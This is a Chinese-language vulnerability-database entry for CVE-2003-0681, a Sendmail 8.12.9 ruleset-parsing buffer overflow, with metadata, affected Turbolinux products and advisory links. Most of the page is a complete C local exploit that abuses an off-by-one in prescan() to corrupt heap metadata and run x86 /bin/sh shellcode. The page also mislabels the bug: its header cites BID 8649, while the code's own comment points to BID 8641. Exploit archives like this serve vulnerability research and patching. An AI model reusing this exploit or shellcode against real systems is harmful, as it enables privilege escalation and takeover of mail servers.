Sendmail Ruleset Parsing 缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107487 漏洞类型 缓冲区溢出
发布时间 2003-09-17 更新时间 2007-09-22
CVE编号 CVE-2003-0681 CNNVD-ID CNNVD-200310-016
漏洞平台 Linux CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/23154
https://www.securityfocus.com/bid/8649
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200310-016
|漏洞详情
Sendmail8.12.9版本在rulesetparsing存在潜在缓冲区溢出漏洞。当使用不标准的rulesets(1)recipient,(2)final,或者(3)mailer-specific信封收件人,该漏洞具有未知的后果。
|漏洞EXP
/*
source: http://www.securityfocus.com/bid/8641/info

Sendmail is prone to a buffer overrun vulnerability in the prescan() function. This issue is different than the vulnerability described in BID 7230. This vulnerability could permit remote attackers to execute arbitrary code via vulnerable versions of Sendmail. 
*/

/* Local exploit for the old sendmail vuln found by lcamtuf in 8.12.9 and below. 
 * by Gyan Chawdhary, gunnu45@hotmail.com
 * 
 * Greets
 * sorbo: all the credits go to him for the ideas regarding the exploitation..
 * lcamtuf: for finding such a subtle bug ..
 * dvorak, scut, gera ..
 * 
 * Theory
 * The problem lies in the prescan function. When returnnull is called it does
 * not do a check to see if p > addr. This results into p pointing past the 
 * array by one byte into the size field tag of the next malloc chunk 
 * ( due to the fact that bufp is allocated in the heap. This value is assigned
 * to *delimptr which is used by invalidaddr in parseaddr. The invalidaddr
 * function  checks for addresses containing characters used by macros. During
 * the parsing of the addrs by invalidaddr, it also checks for illegal chars 
 * in the adress itself, and if found they are replaced with 
 * BAD_CHAR_REPLACEMENT (depending on the size field of the allocation of our 
 * buffer) which is defined as "?" (hex 3f) Due to the offbyone overflow in 
 * prescan, invalidaddr modifies our chunk value which is later used by free()
 * when sm_free(bufp) is called, in return making sendmail vomit !!!!. 
 * Read the code for details.
 * 
 * Gyan
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char sc[] =
        "\xeb\x0a"
        "AAAAAAAAAA"
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

#define CHUNK_SIZE 635

/* This function creats the string with fd and bk pointers and  the shellcode.
 * Heap will look like this
 *---------------------------------------------------------------------
  size = 281|                    |size 23f|fd|bk|shellcode|BBBBBBBB
 ----------------------------------------------------------------------
 * When sm_free(bufp) is called it will consolidate the next buffer, and 
 * use the fd and bk fields with our value which will allow us to overwrite 
 */
 
char *xp_evilstring(int got, int retloc) 
{
	int s;
	char *ptr;
        static char buffer[635];
	ptr = buffer;
	*( (int **)ptr ) = (int *)( got - 12 );
	ptr+=4;
	*( (int **)ptr ) = (int *)( retloc );
	ptr+=4;
	*ptr = '\n';
	ptr++;
	
	/* The '\n' is used for allocating nother buffer in sendtolist by 
	 * denlstring which will copy our fake chunk and which will be later
	 * on consolidated while sm_free(bufp) is called.
	 */
	memcpy(ptr, sc, strlen(sc));
	ptr+=strlen(sc);
	memset(ptr, 'B', sizeof(buffer) - (strlen(sc)+4+4)); 
	/* Used for having the lsb to 0 so that free() will conolidate it with
	 * the other chunk
	 */
	buffer[635] = '\0';
	ptr = buffer;
	s = strlen(ptr);
//	printf("%d\n", s);
//	printf("%s\n", ptr);
	return ptr;	

	
}

/*GOT code*/

#define GREP 	"/bin/grep"
#define OBJDUMP "/usr/bin/objdump"
#define AWK 	"/bin/awk"

int xp_getgot(const char *filename, char *function)
{
	char command[512];
	FILE *file;
	char got[8];

	snprintf(command, sizeof(command), "%s -R %s | %s \"%s\" | %s '{print $1}               '", OBJDUMP, filename, GREP, function, AWK);

	file = (FILE *)popen(command, "r");	
	fgets(got, 11, file);
	pclose(file);
	got[8] = '\0';
	return (strtoul(got, NULL, 16));
}

char *sendmail ="/usr/sbin/sendmail";

main(int argv, char **argc)
{	
	char *c;
	int got = 0x080c1a90;
	int retloc = 0xC0000000 - 4- strlen(sendmail) -1 - strlen(sc)-1;
	
	char *arg[] = { "owned",NULL,sc, NULL };
	c = xp_evilstring(got, retloc);
	printf("%s\n", c);
	arg[1] = xp_evilstring(got, retloc);	
	execve(sendmail,arg,NULL);
}
|受影响的产品
Turbolinux Turbolinux Workstation 8.0 Turbolinux Turbolinux Workstation 7.0 Turbolinux Turbolinux Workstation 6.0 Turbolinux Turbolinux Server 8.0 Turbolinux Turbolinux Server 7.0
|参考资料
resource:
hyperlink:http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000742
resource:
hyperlink:http://marc.info/?l=bugtraq&m=106383437615742&w=2
resource:
hyperlink:http://marc.info/?l=bugtraq&m=106398718909274&w=2
resource:
hyperlink:http://www.debian.org/security/2003/dsa-384
resource:US Government Resource
hyperlink:http://www.kb.cert.org/vuls/id/108964
resource:
hyperlink:http://www.mandriva.com/security/advisories?name=MDKSA-2003:092
resource:
hyperlink:http://www.redhat.com/support/errata/RHSA-2003-283.html
resource:Vendor Advisory
hyperlink:http://www.securityfocus.com/bid/8649
resource:Patch
hyperlink:http://www.sendmail.org/8.12.10.html
resource:
hyperlink:https://exchange.xforce.ibmcloud.com/vulnerabilities/13216
resource:
hyperlink:https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A3606
resource:
hyperlink:https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A595